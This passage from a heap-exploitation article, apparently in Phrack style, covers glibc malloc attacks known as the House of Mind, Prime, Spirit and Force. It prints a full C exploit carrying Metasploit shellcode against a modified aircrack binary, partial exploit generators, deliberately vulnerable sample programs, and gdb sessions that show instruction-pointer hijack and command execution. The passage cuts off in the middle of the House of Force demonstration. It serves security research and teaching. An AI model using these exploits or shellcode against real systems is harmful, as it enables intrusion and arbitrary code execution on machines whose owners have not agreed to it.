+   8049650 ffffffff 00000000
+                    ........        
+   blackngel@mac:~$ gdb -q ./heap1
+   (gdb) break main
+   Breakpoint 1 at 0x8048442
+   (gdb) run < file
+   ...
+   Breakpoint 1, 0x08048442 in main ()
+   (gdb) x/8x 0x08049650
+   0x8049650 <__DTOR_LIST__>: 0xffffffff 0x00000000 0x00000000 0x00000001
+   0x8049660 <_DYNAMIC+4>:    0x00000010 0x0000000c 0x0804830c 0x0000000d
+   (gdb) x/8x 0x08049650 + 1848
+   0x8049d88: 0x00000000   0x00000000   0x00000000   0x00000000
+   0x8049d98: 0x00000000   0x00000000   0x00000000   0x00000000 
+
+   [-----]
+
+   This technique appears to be only apply to large programs. Unless,
+   as Phantasmal said, we can use the stack. How?
+
+   If "ar_ptr" is set to EBP address in a function, then "av->max_fast"
+   will be EIP, which may be overwritten with the address of the chunk
+   "p", and you already know how continues.
+
+Here is ended the theory presented in the two mentioned papers. But
+unfortunately there is something that they forgot... at least it is
+something that quite surprised me from K-sPecial.
+
+We learned about the previous attack, that "av->mutex", which is the first
+item in an "arena" structure, should be equal to 0. K-special, warned us
+that otherwise, "free()" would remain in an infinite loop...
+
+What about DTORS then?
+
+".dtors" will be always "0xffffffff", otherwise it will be a destructor
+address, but never 0.
+
+You can find "0x00000000" four bytes behind of .dtors, but overwrite
+"0xffffffff" has no effect.
+
+What happens then with GOT?
+
+I do not think that you can found 0x00000000 values between each item
+within the GOT.
+
+Solutions?
+
+>From the beginning, I only explored one possible solution:
+
+The main goal would be to use the stack, as mentioned earlier. But the
+difference is that we should have a buffer overflow before that allow
+overwrite EBP with 0 bytes, so we have:
+
+   EBP = av->mutex = 0x00000000
+   EIP = av->max_fast = &(p)
+   *p     = "jmp 0x0c"
+   *p + 4 = 0x0c o 0x0d
+   *p + 8 = NOPS + SHELLCODE 
+
+But a little magic can do wonders...
+
+
+----------------
+ FINAL SOLUTION
+----------------
+
+Phantasmal and K-sPecial thought to use only "av->maxfast" to overwrite
+then this memory location with the address of the chunk "p".
+
+But because we control the entire arena "av", can we afford make a new
+analysis of "fastbin_index()" for a size argument of 16 bytes:
+
+   (16 >> 3) - 2 = 0
+
+So we obtain: fb = &(av->fastbins [0]), and if we get this, we can
+use the stack to overwrite EIP. How?
+
+If our vulnerable code is into fvuln() function, EBP and EIP will be
+pushed in the stack at the prologue, and what there is behind EBP? If no
+user data then usually you can find a "0x00000000" value. If we use
+"av->fastbins[0]" and not "av->maxfast", we have the following:
+
+   [ 0xRAND_VAL ]  <->  av + 1848 = av->system_mem
+    ............
+   [     EIP    ]  <->  av->fastbins[0]
+   [     EBP    ]  <->  av->max_fast
+   [ 0x00000000 ]  <->  av->mutex
+
+	
+In "av + 1848" is normal to find addresses or random values for
+"av->system_mem" and so we can pass the checks to reach the final
+code of "fastbin".
+
+The "size" field of "p" must be 16 with NON_MAIN_ARENA and PREV_INUSE
+bits enabled. Then:
+
+   16 = 10000 | NON_MAIN_ARENA and PREV_INUSE = 101 | SIZE = 10101 = 0x15h
+
+	
+And we can control the "size" field of the next chunk to be greater than
+"8" and less than "av->system_mem". If you look at the code above you will
+note that this field is calculated from the offset of "p", therefore,
+this field is virtually in "p + 0x15", which is an offset of 21 bytes.
+
+If we write a value of "0x09" in that position it will be perfect.
+
+But this value will be in the middle of our NOPS filler and we should make
+a small change in the "JMP" sentence in order to jump farthest. Something
+like 16 bytes will be sufficient.
+
+For the Proof of Concept, I modified "aircrack-2.41" adding in main() the
+following code:
+
+[-----]
+
+  int fvuln()
+  {
+       // Make something stupid here.
+  }
+
+   int main( int argc, char *argv[] )
+   {
+       int i, n, ret;
+       char *s, buf[128];
+       struct AP_info *ap_cur;
+
+       fvuln();
+   ...
+
+[-----]
+
+The next code exploit the vulnerability:
+
+[-----]
+
+/*
+ * FastBin Method - exploit
+ */
+
+#include <stdio.h>
+
+/* linux_ia32_exec -  CMD=/usr/bin/id Size=72 Encoder=PexFnstenvSub 
+http://metasploit.com */
+unsigned char scode[] =
+"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
+"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f"
+"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10"
+"\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26"
+"\x5e\x9e\x39\xcb\xbf\x04\xea\x42";
+
+int main (void) {
+
+        int i, j;
+
+        for (i = 0; i < 1028; i++)                            /* FILLER  */
+                putchar(0x41);
+
+        for (i = 0; i < 518; i++) {
+                fwrite("\x09\x04\x00\x00", 4, 1, stdout);
+                for (j = 0; j < 1028; j++)
+                        putchar(0x41);
+        }
+        fwrite("\x09\x04\x00\x00", 4, 1, stdout);
+
+        for (i = 0; i < (1024 / 4); i++)
+                fwrite("\x34\xf4\xff\xbf", 4, 1, stdout);    /*  EBP - 4 */
+
+        fwrite("\xeb\x16\x90\x90", 4, 1, stdout);            /* JMP 0x16 */
+
+        fwrite("\x15\x00\x00\x00", 4, 1, stdout);  /* 16 + N_M_A + P_INU */
+        
+        fwrite("\x90\x90\x90\x90" \
+               "\x90\x90\x90\x90" \
+               "\x90\x90\x90\x90" \
+               "\x09\x00\x00\x00" \                   /* nextchunk->size */
+               "\x90\x90\x90\x90", 20, 1, stdout);
+                       
+
+        fwrite(scode, sizeof(scode), 1, stdout);      /* THE MAGIC CODE  */
+
+        return(0);
+}
+
+[-----]
+
+Let's now see it in action:
+
+[-----]
+
+blackngel@linux:~$ gcc ploit1.c -o ploit
+blackngel@linux:~$ ./ploit > file
+blackngel@linux:~$ gdb -q ./aircrack
+
+(gdb) disass fvuln
+Dump of assembler code for function fvuln:
+.........
+.........
+0x08049298 <fvuln+184>:	call   0x8048d4c <free@plt>
+0x0804929d <fvuln+189>:	movl   $0x8056063,(%esp)
+0x080492a4 <fvuln+196>:	call   0x8048e8c <puts@plt>
+0x080492a9 <fvuln+201>:	mov    %esi,(%esp)
+0x080492ac <fvuln+204>:	call   0x8048d4c <free@plt>
+0x080492b1 <fvuln+209>:	movl   $0x8056075,(%esp)
+0x080492b8 <fvuln+216>:	call   0x8048e8c <puts@plt>
+0x080492bd <fvuln+221>:	add    $0x1c,%esp
+0x080492c0 <fvuln+224>:	xor    %eax,%eax
+0x080492c2 <fvuln+226>:	pop    %ebx
+0x080492c3 <fvuln+227>:	pop    %esi
+0x080492c4 <fvuln+228>:	pop    %edi
+0x080492c5 <fvuln+229>:	pop    %ebp
+0x080492c6 <fvuln+230>:	ret    
+End of assembler dump.
+
+(gdb) break *fvuln+204                         /* Before second free() */
+Breakpoint 1 at 0x80492ac: file linux/aircrack.c, line 2302.
+
+(gdb) break *fvuln+209                         /* After second free() */
+Breakpoint 2 at 0x80492b1: file linux/aircrack.c, line 2303.
+
+(gdb) run < file
+Starting program: /home/blackngel/aircrack < file
+[Thread debugging using libthread_db enabled]
+ptr found at 0x807d008
+good heap allignment found on malloc() 521 (0x8100048)
+
+END fread()                 /* tests when free () freezing (mutex != 0) */
+                        
+END first free()            /* tests when free () freezing (mutex != 0) */
+[New Thread 0xb7e5b6b0 (LWP 8312)]
+[Switching to Thread 0xb7e5b6b0 (LWP 8312)]
+
+Breakpoint 1, 0x080492ac in fvuln () at linux/aircrack.c:2302
+warning: Source file is more recent than executable.
+2302	        free(ptr2);
+
+/* STACK DUMP */
+(gdb) x/4x 0xbffff434    // av->max_fast // av->fastbins[0]
+0xbffff434:   0x00000000     0xbffff518     0x0804ce52     0x080483ec
+
+(gdb) x/x 0xbffff434 + 1848  /* av->system_mem */
+0xbffffb6c:	0x3d766d77
+
+(gdb) x/4x 0x08100048-8+20   /* nextchunk->size */
+0x8100054:  0x00000009   0x90909090   0xe983c931   0xd9eed9f4
+(gdb) c
+Continuing.
+
+Breakpoint 2, fvuln () at linux/aircrack.c:2303
+2303	        printf("\nEND second free()\n");
+
+(gdb) x/4x 0xbffff434                 // EIP = &(p)
+0xbffff434:  0x00000000   0xbffff518   0x08100040   0x080483ec
+(gdb) c
+Continuing.
+
+END second free()
+[New process 8312]
+uid=1000(blackngel) gid=1000(blackngel) groups=4(adm),20(dialout),
+24(cdrom),25(floppy),29(audio),30(dip),33(www-data),44(video),
+46(plugdev),104(scanner),108(lpadmin),110(admin),115(netdev),
+117(powerdev),1000(blackngel),1001(compiler)
+
+Program exited normally.
+
+[-----]
+
+The advantage of this method is that it does not touch at any time the EBP
+register, and thus we can skip some protection to BoF.
+
+It is also noteworthy that the two methods presented here, in The House of
+Mind, are still applicable in the most recent versions of glibc, I have
+checked it with the latest version of GLIBC 2.8.90.
+
+This time we have arrived, walking with lead foot and after a long
+journey, to The House of Mind.
+
+
+
+                 << Solo existen 10 tipos de personas: los que
+                    saben binario y los que no. >>
+
+                                                       [ XXX ]
+
+
+
+               -----------------------
+---[ 4.1.2 ---[   av->top NIGHTMARE   ]---
+               -----------------------
+
+Once I had completed the study of The House of Mind, tracking down a
+little more code in search of other possible attack vectors, I found
+something like this at _int_free ():
+
+[-----]
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+[-----]
+
+Since we control the arena "av", we could place it in a certain location
+of the stack, such that av->top coincide exactly with a saved EIP.
+
+At this point, EIP would be overwritten with the address of our chunk "p"
+overflowed. Then one arbitrary code execution could be triggered.
+
+But my intentions were soon frustrated. To achieve execution of this code,
+in a controlled environment, we should meet one impossible condition:
+
+    if (nextchunk != av->top) {
+       ...
+    }
+
+This only happens when the chunk "p" that will be free()ed, is contiguous
+to the highest chunk, the Wilderness.
+
+At some point you might think that you control the value of av->top, but
+remember that once you place av in the stack, the control is passed to
+random values in memory, and the current value of EIP never will be equal
+to "nextchunk" unless it is possible one classic stack-overflow, then I
+don't know that you do reading this article...
+
+That I just want to prove, that for better or for worse, all possible ways
+should be examined carefully.
+
+
+
+                    << Hasta ahora las masas han ido
+                       siempre tras el hechizo. >>
+
+                                      [ K. Jaspers ]
+
+
+
+             ------------------------
+---[ 4.2 ---[   THE HOUSE OF PRIME   ]---
+             ------------------------
+	
+Thus seen to date, I do not want to dwell too much. The House of Prime is,
+unquestionably, one of the most elaborated techniques in Malloc
+Maleficarum . The result of a virtual adept.
+
+However, as mentioned Phantasmal well, it is the least useful of all them
+at first. While bearing in mind that The House of Mind requires a chunk of
+memory located in 0x08100000, this should not be left aside.
+
+To perform this technique will be needed tow calls to free() over two
+chunks of memory that should be under designer's control, and one future
+call to "malloc ()".
+
+The goal here, it sould be clear, it is not overwrite any memory address
+(even if it's necessary to completion of the technique), but make that
+one call to "malloc()" returns an arbitrary memory address. Then, if we
+can control this area doing that it will fall in the stack, we could take
+total control of application.
+
+A final requirement is that the designer must control what is written in
+this allocated chunk, so if we put it on the stack, relatively close to
+EIP, this register can be overwritten with a arbitrary value. And you
+already know as follows...
+
+Let's see a vulnerable program:
+
+[-----]
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void fvuln(char *str1, char *str2, int age)
+{
+   int local_age;
+   char buffer[64];
+   char *ptr = malloc(1024);
+   char *ptr1 = malloc(1024);
+   char *ptr2 = malloc(1024);
+   char *ptr3;
+
+   local_age = age;
+   strncpy(buffer, str1, sizeof(buffer)-1);
+
+   printf("\nptr found at [ %p ]", ptr);
+   printf("\nptr1ovf found at [ %p ]", ptr1);
+   printf("\nptr2ovf found at [ %p ]\n", ptr2);
+
+   printf("Enter a description: ");
+   fread(ptr, 1024 * 5, 1, stdin); 
+
+   free(ptr1);
+   printf("\nEND free(1)\n");
+   free(ptr2);
+   printf("\nEND free(2)\n");
+
+   ptr3 = malloc(1024);
+   printf("\nEND malloc()\n");
+   strncpy(ptr3, str2, 1024-1);
+
+   printf("Your name is %s and you are %d", buffer, local_age);
+}
+
+int main(int argc, char *argv[])
+{
+   if(argc < 4) {
+      printf("Usage: ./hop name last-name age");
+      exit(0);
+   }
+
+   fvuln(argv[1], argv[2], atoi(argv[3]));
+
+   return 0;
+}
+
+
+[-----]
+
+To start, we need to control the header of a first chunk that will be
+passed to free(), so that when we trigger a first call to "free()", the
+same code that in the "FastBin Method" will be used, but this time the
+size field of the chunk has to be "8", and obtain:
+
+   fastbin_index(8) ((((unsigned int)(8)) >> 3) - 2) = -1
+
+Then:
+
+   fb = &(av->fastbins[-1]) = &av->max_fast;
+
+In the last sentence: (*fb = p), av-> max_fast will be overwritten with
+the address of our chunk being free()'d.
+
+The result is very evident, from that moment we can run the same piece of
+code in free() whenever the size of chunk that will be passed to free()
+is less than the value of the chunk address "p" previously free()'d.
+
+Typically: av->max_fast = 0x00000048, and now is 0x080YYYYY. What is
+more than you need.
+
+To pass the integrity chesks of the first free() call, we need these
+sizes:
+
+chunk "p" -> 8 (0x9h if PREV_INUSE bit is set).
+nextchunk -> 10h is a good value ( 8 < "0x10h" < av->system_mem )
+
+So the exploit would start with something like this:
+
+[-----]
+
+int main (void) {
+
+        int i, j;
+
+        for (i = 0; i < 1028; i++)                           /* FILLER */
+                putchar(0x41);
+
+        fwrite("\x09\x00\x00\x00", 4, 1, stdout); /* free(1) ptr1 size */
+        fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* FILLER */
+        fwrite("\x10\x00\x00\x00", 4, 1, stdout); /* free(1) ptr2 size */
+
+[-----]
+
+The next mission is to overwrite the value of "arena_key" (read Malloc
+Maleficarum for details) which is typically above "av" (&main_arena).
+
+As we can use chunks of very large sizes, we can make that
+&(av->fastbins[x]) points very far. At least enough to reach the
+value of "arena_key" and overwrite it with the "p" address.
+
+Taking the example of Phantasmal, we would have to resize the second chunk
+to with the next value:
+
+   1156 bytes / 4 = 289
+   (289 + 2) << 3 = 2328 = 0x918h -> 0x919 (PREV_INUSE)
+                           ------
+
+You have to check again the "size" field of the next chunk, whose address
+is calculated from the value that we obtain a moment ago.
+
+You can continue your exploit:
+
+[-----]
+
+        for (i = 0; i < 1020; i++)
+                putchar(0x41);
+        fwrite("\x19\x09\x00\x00", 4, 1, stdout); /* free(2) ptr2 size */
+
+        .... /* Later */
+
+        for (i = 0; i < (2000 / 4); i++)
+                fwrite("\x10\x00\x00\x00", 4, 1, stdout);
+
+[-----]
+
+At the end of the second free (): arena_key = p2.
+
+This value will be used by the call to malloc () setting it as the "arena"
+structure to use.
+
+    arena_get(ar_ptr, bytes);
+    if(!ar_ptr)
+      return 0;
+    victim = _int_malloc(ar_ptr, bytes);
+
+Again, let's go to see, to be more intuitive, the magic code of
+"_int_malloc()" function:
+
+    .....
+
+    if ((unsigned long)(nb) <= (unsigned long)(av->max_fast)) {
+      long int idx = fastbin_index(nb);
+      fb = &(av->fastbins[idx]);
+      if ( (victim = *fb) != 0) {
+        if (fastbin_index (chunksize (victim)) != idx)
+          malloc_printerr (check_action, "malloc(): memory"
+            " corruption (fast)", chunk2mem (victim));
+        *fb = victim->fd;
+        check_remalloced_chunk(av, victim, nb);
+        return chunk2mem(victim);
+      }
+
+    .....
+
+"av" is now our arena, which starts at the beginning of the second chunk
+liberated "p2", then it is clear that "av->max_fast" will be equal to the
+"size" field of the chunk. In order to pass the first integrity check, we
+have to ensure that the size requested by the "malloc()" call is less than
+that value, as Phantasmal said, otherwise you can try the technique
+described in 4.2.1.
+
+As our vulnerable program allocate 1024 bytes, it will be perfect por a
+successful exploitation.
+
+Then we can see that "fb" is set to address of a "fastbin" in "av", and in
+the following sentence, its content will be the final address of "victim".
+Remember that our goal is to allocate an amount of bytes into a place of
+our choice.
+
+Do you remember / * Later * / ?
+
+Well, that is where we need to copy repeatedly the address that we want
+in the stack, so any return "fastbin" set our address in "fb".
+
+Mmmmm, but wait a moment, the next condition is the most important:
+
+   if (fastbin_index (chunksize (victim)) != idx)
+
+This means that the "size" field of our fakechunk must be equal to the
+amount requested by "malloc()". This is the last requirement in The House
+of Prime. We must control a value into memory and place address of
+"victim" just 4 bytes before, so this value would become its new size.
+
+Our vulnerable application get as parameters: "name", "surname" and "age".
+This last value is an integer that will be stored in the stack. If we
+make: age = 1024->(1032), we only must look for it into the stack to know
+the final address of "victim".
+
+[-----]
+
+(gdb) run Black Ngel 1032 < file
+ptr found at [ 0x80b2a20 ]
+ptr1ovf found at [ 0x80b2e28 ]
+ptr2ovf found at [ 0x80b3230 ]
+Escriba una descripcion:
+END free(1)
+
+END free(2)
+
+Breakpoint 2, 0x080482d9 in fvuln ()
+(gdb) x/4x $ebp-32
+0xbffff838:     0x00000000      0x00000000      0xbf000000      0x00000408
+
+[-----]
+
+Here we have our value, we should point to "0xbffff840".
+
+        for (i = 0; i < (600 / 4); i++)
+                fwrite("\x40\xf8\xff\xbf", 4, 1, stdout);
+	
+You should have: ptr3 = malloc(1024) = 0xbffff848, remember that it
+returns a pointer to the memory (data area) and not to chunk's header.
+
+We are really close to EBP and EIP. What happens if our "name" is
+composed by a few letters "A"?
+
+[-----]
+
+(gdb) run Black `perl -e 'print "A"x64'` 1032 < file
+.....
+ptr found at [ 0x80b2a20 ]
+ptr1ovf found at [ 0x80b2e28 ]
+ptr2ovf found at [ 0x80b3230 ]
+Escriba una descripcion:
+END free(1)
+
+END free(2)
+
+Breakpoint 2, 0x080482d9 in fvuln ()
+(gdb) c
+Continuing.
+
+END malloc()
+
+Breakpoint 3, 0x08048307 in fvuln ()
+(gdb) c
+Continuing.
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+(gdb)
+
+[-----]
+	
+Bingo! I think that you can put your own Shellcode, right?
+
+Actually, addresses require manual adjustments, but that is trivial when
+you know write "gdb" in your shell.
+
+At first, this technique is only applicable to version 2.3.6 of GLIBC.
+Later was added in the "free()" function an integrity check like this:
+
+[-----]
+
+  /* We know that each chunk is at least MINSIZE bytes in size. */
+  if (__builtin_expect (size < MINSIZE, 0))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+[-----]
+
+	
+Which does not allow us to establish a smaller size than "16".
+
+In honor to the first house developed and built by Phantasmal we have
+shown that it is possible to arrive alive at The House of Prime.
+
+
+
+                       << La tecnica no solo es una
+                          modificacion, es poder sobre
+                          las cosas. >>
+
+                                     [ Xavier Zubiri ]
+
+
+
+               -----------------------
+---[ 4.2.1 ---[   unsorted_chunks()   ]---
+               -----------------------
+	
+Until the call to "malloc()", the technique is exactly the same as
+described in 4.2. The difference comes when the amount of bytes that you
+want to alloc with that call is over "av->max_fast", which appears to be
+the size of the second chunk passed to free().
+
+Then, as Phantasmal advanced us, another piece of code can be triggered so
+that we will can overwrite an arbitrary address of memory.
+
+But again he was wrong when he said:
+
+   "Firstly, the unsorted_chunks() macro returns av->bins[0]."
+
+And this is not true, because "unsorted_chunks ()" returned address of
+"av->bins[0]" and not its value, which means that we must devise another
+method.
+
+Being these lines the most relevant:
+
+     .....
+        victim = unsorted_chunks(av)->bk
+        bck = victim->bk;
+        .....
+        .....
+        unsorted_chunks(av)->bk = bck;
+        bck->fd = unsorted_chunks(av);
+     .....
+
+I propose the following method:
+
+ 1) Put at &av->bins[0]+12 the address of (&av->bins[0]+16-12). Then:
+
+    victim = &av->bins[0]+4;
+
+ 2) Put at &av->bins[0]+16 address of EIP - 8. Then:
+
+    bck = (&av->bins[0]+4)->bk = av->bins[0]+16 = &EIP-8;
+
+ 3) Put at av->bins[0] a "JMP 0xYY" sentence to jump at least as far
+    as &av->bins[0]+20. In the penultimate sentence it will destroy
+    &av->bins[0]+12, but it is not important now, to the end we will
+    have:
+
+    bck->fd = EIP = &av->bins[0];
+
+ 4) Put (NOPS + SHELLCODE) from &av->bins[0] + 20.
+
+ 	
+When a "ret" instruction is executed, it will go to our "JMP" and this
+fall directly on the NOPS, moving east until the shellcode.
+
+We should have something like this:
+
+
+    &av->bins[0]     &av->bins[0]+12     &av->bins[0]+16
+    |                |                   |
+ ...[ JMP 0x16 ].....[&av->bins[0]+16-12][ EIP - 8][ NOPS + SHELLCODE ]...
+           |______________________|______|_________|
+          (2)                     |______|
+                                 (1)
+
+  (1) This happens here: bck = (&av->bins[0]+4)->bk.
+  (2) This happens after the execution of a "ret"
+
+	
+The great advantage of this method is that we can achieve a direct
+arbitrary code execution instead of returning a controlled chunk from
+"malloc()".
+
+Perhaps through this clever way you can directly reach The House of Prime.
+
+
+
+               << Felicidad no es hacer lo que
+                  uno quiere, sino querer lo que
+                  uno hace. >>
+
+                                [ J. P. Sartre ]
+
+
+
+             -------------------------
+---[ 4.3 ---[   THE HOUSE OF SPIRIT   ]---
+             -------------------------
+
+The House of Spirit is, undoubtedly, one of the most simple applied
+technique when circumstances are propitious. The goal is to overwrite
+a pointer that was previously allocated with a call to "malloc()" so
+that when this is passed to free(), an arbitrary address will be stored
+in a "fastbin[]".
+
+This can bring that in a future call to malloc(), this value will be taken
+as the new memory for the requested chunk. And what happens if I do that
+this memory chunk to fall into any specific area of stack?
+
+Well, if we can control what we write in, we can change everything value
+that is ahead. As always, this is where EIP enters to the game.
+
+Let's go to see a vulnerable program:
+
+[-----]
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void fvuln(char *str1, int age)
+{
+   static char *ptr1, name[32];
+   int local_age;
+   char *ptr2;
+
+   local_age = age;
+
+   ptr1 = (char *) malloc(256);
+   printf("\nPTR1 = [ %p ]", ptr1);
+   strcpy(name, str1);
+   printf("\nPTR1 = [ %p ]\n", ptr1);
+
+   free(ptr1);
+
+   ptr2 = (char *) malloc(40);
+
+   snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
+   printf("\n%s\n", ptr2);
+}
+
+int main(int argc, char *argv[])
+{
+   if (argc == 3)
+      fvuln(argv[1], atoi(argv[2]));
+
+   return 0;
+}
+
+[-----]
+
+It is easy to see how the "strcpy()" function allow to overwrite the
+"ptr1" pointer:
+
+   blackngel@mac:~$ ./hos `perl -e 'print "A"x32 . "BBBB"'` 20
+   PTR1 = [ 0x80c2688 ]
+   PTR1 = [ 0x42424242 ]
+   Segmentation fault
+	
+With this in mind, we can change the address of the chunk, but not all
+addresses are valid. Remember that in order to execute the "fastbin" code
+described in The House of Prime, we need a minor value than "av->max_fast"
+and, more specifically, as Phantasmal said, it has to be equal to the size
+requested in the future call to "malloc()" + 8.
+
+So as one of the arguments in our application is the "age" parameter, we
+can put any value in the stack, which in this case will be "0x48", and
+seek its address.
+
+(gdb) x/4x $ebp-4
+0xbffff314:	0x00000030	0xbffff338	0x080482ed	0xbffff702
+
+In our case we see that the value is just behind EBP, and PTR1 would must
+point to EBP. Remember that we are modifying the pointer to memory, not
+the chunk's address.
+
+The most important requirement to success of this technique is pass the
+integrity check of the next chunk:
+
+      if (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+          || __builtin_expect (chunksize (chunk_at_offset (p, size))
+                                          >= av->system_mem, 0))
+
+... at $EBP - 4 + 48 we must have a value that meets the above conditions.
+Otherwise you should look for another addresses of memory that can allow
+you to control both values.
+
+(gdb) x/4x $ebp-4+48
+0xbffff344:	0x0000012c	0xbffff568	0x080484eb	0x00000003
+
+I will shown what it happens:
+
+
+                   val1         target                val2
+                    o             |                     o
+      -64           |  mem  -4    0   +4  +8  +12 +16   |
+       |            |   |    |    |    |   |   |   |    |
+  .....][P_SIZE][size+8][...][EBP][EIP][..][..][..][next_size][ ......
+                    |   |                           |
+                    o---|---------------------------o
+                        |      (size + 8) bytes
+                       PTR1
+                        |---> Future PTR2
+                                     ----
+
+   (target) Value to overwrite.
+   (mem)  Data of fakechunk.
+   (val1) Size of fakechunk.
+   (val2) Size of next chunk.
+
+
+If this happens, control will be in our hands:
+
+[-----]
+
+blackngel@linux:~$ gdb -q ./hos
+(gdb) disass fvuln
+Dump of assembler code for function fvuln:
+0x080481f0 <fvuln+0>:	push   %ebp
+0x080481f1 <fvuln+1>:	mov    %esp,%ebp
+0x080481f3 <fvuln+3>:	sub    $0x28,%esp
+0x080481f6 <fvuln+6>:	mov    0xc(%ebp),%eax
+0x080481f9 <fvuln+9>:	mov    %eax,-0x4(%ebp)
+0x080481fc <fvuln+12>:	movl   $0x100,(%esp)
+0x08048203 <fvuln+19>:	call   0x804f440 <malloc>
+..........
+..........
+0x08048230 <fvuln+64>:	call   0x80507a0 <strcpy>
+..........
+..........
+0x08048252 <fvuln+98>:	call   0x804da50 <free>
+0x08048257 <fvuln+103>:	movl   $0x28,(%esp)
+0x0804825e <fvuln+110>:	call   0x804f440 <malloc>
+..........
+..........
+0x080482a3 <fvuln+179>:	leave  
+0x080482a4 <fvuln+180>:	ret    
+End of assembler dump.
+
+(gdb) break *fvuln+19          /* Before malloc() */
+Breakpoint 1 at 0x8048203
+
+(gdb) run `perl -e 'print "A"x32 . "\x18\xf3\xff\xbf"'` 48
+.........
+..........
+Breakpoint 1, 0x08048203 in fvuln ()
+(gdb) x/4x $ebp-4   /* 0x30 = 48 */
+0xbffff314:	0x00000030	0xbffff338	0x080482ed	0xbffff702
+
+(gdb) x/4x $ebp-4+48   /* 8 < 0x12c < av->system_mem */
+0xbffff344:	0x0000012c	0xbffff568	0x080484eb	0x00000003
+
+(gdb) c
+Continuing.
+
+PTR1 = [ 0x80c2688 ]
+PTR1 = [ 0xbffff318 ]
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+
+[-----]
+
+In this special case, the address of EBP would be the address of PTR2 zone
+data, which means that the fourth write character will overwrite EIP, and
+you will can point to your Shellcode.
+
+This technique has the advantage, once again, to remain applicable in
+the newer versions of glibc so as PTMALLOC3. Must be known that the
+Phantasmal's theory still remain to the pass of the time.
+
+Now you can feel the power of witches. We arrived, flying in broom at The
+House of Spirit.
+
+
+
+                        << La television es el espejo donde
+                           se refleja la derrota de todo
+                           nuestro sistema cultural. >>
+
+                                       [ Federico Fellini ]
+
+
+
+             -------------------------
+---[ 4.4 ---[   THE HOUSE OF FORCE    ]---
+             -------------------------
+
+The top chunk (Wilderness), as I mentioned earlier in this article may be
+one of the most dreaded chunks. Sure, it is treated in a special way by
+the free() and malloc() functions, but in this case will be the trigger
+for a possible arbitrary code execution.
+
+The main goal of this technique is to reach the next piece of code in
+"_int_malloc ()":
+
+[-----]
+
+    .....
+    use_top:
+      victim = av->top;
+      size = chunksize(victim);
+
+      if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
+        remainder_size = size - nb;
+        remainder = chunk_at_offset(victim, nb);
+        av->top = remainder;
+        set_head(victim, nb | PREV_INUSE |
+                 (av != &main_arena ? NON_MAIN_ARENA : 0));
+        set_head(remainder, remainder_size | PREV_INUSE);
+        check_malloced_chunk(av, victim, nb);
+        return chunk2mem(victim);
+      }
+    .....
+
+[-----]
+	
+This technique requires three conditions:
+
+    1 - One overflow in a chunk that allows to overwrite the Wilderness.
+
+    2 - A call to "malloc()" with size field defined by designer.
+
+    3 - Another call to "malloc()" where data can be handled by designer.
+
+The ultimate goal is to get a chunk placed in an arbitrary memory. This
+position will be obtained by the last call to "malloc()", but first we
+must analyse more things.
+
+Consider first a possible vulnerable program:
+
+[-----]
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void fvuln(unsigned long len, char *str)
+{
+   char *ptr1, *ptr2, *ptr3;
+
+   ptr1 = malloc(256);
+   printf("\nPTR1 = [ %p ]\n", ptr1);
+   strcpy(ptr1, str);
+
+   printf("\Allocated MEM: %u bytes", len);
+   ptr2 = malloc(len);
+   ptr3 = malloc(256);
+
+   strncpy(ptr3, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 256);
+}
+
+int main(int argc, char *argv[])
+{
+   char *pEnd;
+   if (argc == 3)
+      fvuln(strtoull(argv[1], &pEnd, 10), argv[2]);
+
+   return 0;
+}
+
+[-----]
+
+Phantasmal said that the first thing to do was to overwrite the
+Wilderness chunk so that its "size" field was as high as possible,
+as well as "0xffffffff". Since our first chunk is 256 bytes long,
+and it is vulnerable to overflow, 264 characters "\xff" achieve the
+objective.
+
+This ensures that any request of memory enough large, is treated with
+the code "_int_malloc()", instead of expand the heap.
+
+The second goal, is to alter "av->top" so it points to a memory area under
+designer control. We (it's view in next section) will work with the stack,
+particularly with the EIP target. In fact, the address that should be
+placed in "av->top" is EIP - 8, because we are dealing with the chunk
+address, and the return data area is 8 bytes later, there where we will
+write our data.
+
+But... How hack "av->top"?
+
+   victim = av->top;
+   remainder = chunk_at_offset(victim, nb);
+   av->top = remainder;
+
+"victim" get address of the current Wilderness chunk, that in a normal
+case we could see so as: 
+
+   PTR1 = [ 0x80c2688 ]
+
+   0x80bf550 <main_arena+48>:   0x080c2788
+
+As we can see, "remainder" is exactly the sum of this address plus the
+number of bytes requested by "malloc ()". This amount must be controlled
+by the designer as mentioned above.
+
+Then, if EIP is "0xbffff22c", the address that we want placed at remainder
+(which will goes direct to "av->top") is actually this: "0xbfffff24". And
+now we know where this "av->top". Our number of bytes to request are:
+
+    0xbffff224 - 0x080c2788 = 3086207644
+
+I exploited the program with "3086207636", which again, is due to the
+difference between the position of the chunk and data area of Wilderness.
+
+Since that time, "av->top" contain our altered value, and any request that
+triggers this piece of code, get this address as its data zone. Everything
+that is written will destroy the stack.
+
+GLIBC 2.7 do the next:
+
+      ....
+      void *p = chunk2mem(victim);
+      if (__builtin_expect (perturb_byte, 0))
+	alloc_perturb (p, bytes);
+      return p;
+
+Let's to go:
+
+[-----]
+
+blackngel@linux:~$ gdb -q ./hof
+(gdb) disass fvuln
+Dump of assembler code for function fvuln:
